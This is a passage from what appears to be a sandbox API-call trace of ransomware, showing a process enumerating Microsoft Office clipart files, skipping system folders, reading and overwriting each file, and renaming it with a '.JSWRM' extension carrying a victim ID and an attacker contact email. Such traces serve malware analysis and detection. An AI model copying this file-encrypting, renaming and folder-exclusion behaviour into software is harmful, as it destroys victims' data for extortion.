(HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0079.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090783.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090783.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0090783.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0079.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0079.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090783.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090783.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0090783.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0079.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0079.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0079.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0079.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090783.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.533] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6934) returned 1 [0079.533] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b10) returned 0x205850 [0079.534] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1b10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1b10, lpOverlapped=0x0) returned 1 [0079.536] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.536] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1b10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1b10, lpOverlapped=0x0) returned 1 [0079.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.536] CloseHandle (hObject=0x314) returned 1 [0079.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0079.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0079.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0079.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0079.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0079.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0079.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0079.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0079.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0079.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0079.536] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090783.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090783.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0079.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0079.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0079.537] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe03547c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe03547c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe03547c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa442, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0093905.WMF", cAlternateFileName="")) returned 1 [0079.537] lstrcmpiW (lpString1="J0093905.WMF", lpString2=".") returned 1 [0079.537] lstrcmpiW (lpString1="J0093905.WMF", lpString2="..") returned 1 [0079.537] lstrcmpiW (lpString1="J0093905.WMF", lpString2="...") returned 1 [0079.537] lstrcmpiW (lpString1="J0093905.WMF", lpString2="windows") returned -1 [0079.537] lstrcmpiW (lpString1="J0093905.WMF", lpString2="recovery") returned -1 [0079.537] lstrcmpiW (lpString1="J0093905.WMF", lpString2="perflogs") returned -1 [0079.537] lstrcmpiW (lpString1="J0093905.WMF", lpString2="documents and settings") returned 1 [0079.537] lstrcmpiW (lpString1="J0093905.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.537] lstrcmpiW (lpString1="J0093905.WMF", lpString2="system volume information") returned -1 [0079.537] lstrcmpiW (lpString1="J0093905.WMF", lpString2="msocache") returned -1 [0079.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0093905.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0093905.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0093905.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0093905.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0093905.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0093905.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0079.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0079.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0079.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0093905.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.538] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=42050) returned 1 [0079.538] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa440) returned 0x24d210 [0079.538] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa440, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa440, lpOverlapped=0x0) returned 1 [0079.544] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.544] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa440, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa440, lpOverlapped=0x0) returned 1 [0079.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.545] CloseHandle (hObject=0x314) returned 1 [0079.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0079.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0079.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0079.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0079.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0079.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0079.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.545] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0093905.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0093905.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0079.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0079.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0079.546] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe03547c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe03547c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe03547c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x136a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0098497.WMF", cAlternateFileName="")) returned 1 [0079.546] lstrcmpiW (lpString1="J0098497.WMF", lpString2=".") returned 1 [0079.546] lstrcmpiW (lpString1="J0098497.WMF", lpString2="..") returned 1 [0079.546] lstrcmpiW (lpString1="J0098497.WMF", lpString2="...") returned 1 [0079.546] lstrcmpiW (lpString1="J0098497.WMF", lpString2="windows") returned -1 [0079.546] lstrcmpiW (lpString1="J0098497.WMF", lpString2="recovery") returned -1 [0079.546] lstrcmpiW (lpString1="J0098497.WMF", lpString2="perflogs") returned -1 [0079.546] lstrcmpiW (lpString1="J0098497.WMF", lpString2="documents and settings") returned 1 [0079.546] lstrcmpiW (lpString1="J0098497.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.546] lstrcmpiW (lpString1="J0098497.WMF", lpString2="system volume information") returned -1 [0079.546] lstrcmpiW (lpString1="J0098497.WMF", lpString2="msocache") returned -1 [0079.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0079.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0098497.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0098497.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0098497.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0079.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0079.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0098497.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0098497.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0098497.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0079.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0079.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0079.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0079.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0098497.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.547] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4970) returned 1 [0079.547] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1360) returned 0x205850 [0079.548] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1360, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1360, lpOverlapped=0x0) returned 1 [0079.552] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.552] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1360, lpOverlapped=0x0) returned 1 [0079.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.552] CloseHandle (hObject=0x314) returned 1 [0079.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0079.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0079.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0079.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0079.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0079.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0079.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.553] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0098497.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0098497.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0079.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0079.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0079.553] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe05b6d7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe05b6d7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe081920, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x60b7, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099145.JPG", cAlternateFileName="")) returned 1 [0079.553] lstrcmpiW (lpString1="J0099145.JPG", lpString2=".") returned 1 [0079.553] lstrcmpiW (lpString1="J0099145.JPG", lpString2="..") returned 1 [0079.553] lstrcmpiW (lpString1="J0099145.JPG", lpString2="...") returned 1 [0079.553] lstrcmpiW (lpString1="J0099145.JPG", lpString2="windows") returned -1 [0079.553] lstrcmpiW (lpString1="J0099145.JPG", lpString2="recovery") returned -1 [0079.553] lstrcmpiW (lpString1="J0099145.JPG", lpString2="perflogs") returned -1 [0079.553] lstrcmpiW (lpString1="J0099145.JPG", lpString2="documents and settings") returned 1 [0079.553] lstrcmpiW (lpString1="J0099145.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.553] lstrcmpiW (lpString1="J0099145.JPG", lpString2="system volume information") returned -1 [0079.554] lstrcmpiW (lpString1="J0099145.JPG", lpString2="msocache") returned -1 [0079.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099145.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099145.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099145.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0079.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099145.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099145.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099145.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0079.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0079.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0079.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.554] 